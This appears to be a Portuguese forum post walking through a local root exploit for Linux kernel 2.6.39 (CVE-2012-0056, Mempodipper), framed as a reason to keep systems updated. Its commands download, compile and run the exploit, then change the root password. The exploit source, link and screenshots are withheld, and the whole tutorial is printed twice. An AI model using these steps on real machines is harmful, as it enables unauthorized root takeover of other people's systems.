A vulnerabilidade exibida no CVE-2012-0056 destaca a possibilidade de inserir um shell code na memória e obter acesso como root no kernel 2.6.39 e outras versões.
Ainda há muitas empresas que possuem soluções críticas em produção sobre sistemas vulneráveis como este.
É extremamente importante manter todos os sistemas sempre atualizados, reforce este ponto com seus clientes.
Segue passo a passo como explorar a vulnerabilidade:
Passo 01
Logue com um usuário comum e verifique a versão no kernel
marcos@linux:~$ uname -r
2.6.39.4
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 02
Realize o download do exploit mempodipper.c
marcos@linux:~$ wget [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 03
Visualize o arquivo mempodipper.c
marcos@linux:~$ ls -l
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 04
Compile o exploit usando o GCC
marcos@linux:~$ gcc mempodipper.c -o mempodipper
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 05
O exploit mempodipper foi compilado
marcos@linux:~$ ls -l
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 06
Execute o exploit
marcos@linux:~$ ./mempodipper
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 07
Acesso como root realizado com sucesso!
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 08
Altere a senha do root
sh-4.1# passwd
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 09
Acesso como root com a nova senha realizada com sucesso!
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Ainda há muitas empresas que possuem soluções críticas em produção sobre sistemas vulneráveis como este.
É extremamente importante manter todos os sistemas sempre atualizados, reforce este ponto com seus clientes.
Segue passo a passo como explorar a vulnerabilidade:
Passo 01
Logue com um usuário comum e verifique a versão no kernel
marcos@linux:~$ uname -r
2.6.39.4
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 02
Realize o download do exploit mempodipper.c
marcos@linux:~$ wget [Tens de ter uma conta e sessão iniciada para poderes visualizar este link]
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 03
Visualize o arquivo mempodipper.c
marcos@linux:~$ ls -l
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 04
Compile o exploit usando o GCC
marcos@linux:~$ gcc mempodipper.c -o mempodipper
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 05
O exploit mempodipper foi compilado
marcos@linux:~$ ls -l
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 06
Execute o exploit
marcos@linux:~$ ./mempodipper
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 07
Acesso como root realizado com sucesso!
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 08
Altere a senha do root
sh-4.1# passwd
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]
Passo 09
Acesso como root com a nova senha realizada com sucesso!
[Tens de ter uma conta e sessão iniciada para poderes visualizar esta imagem]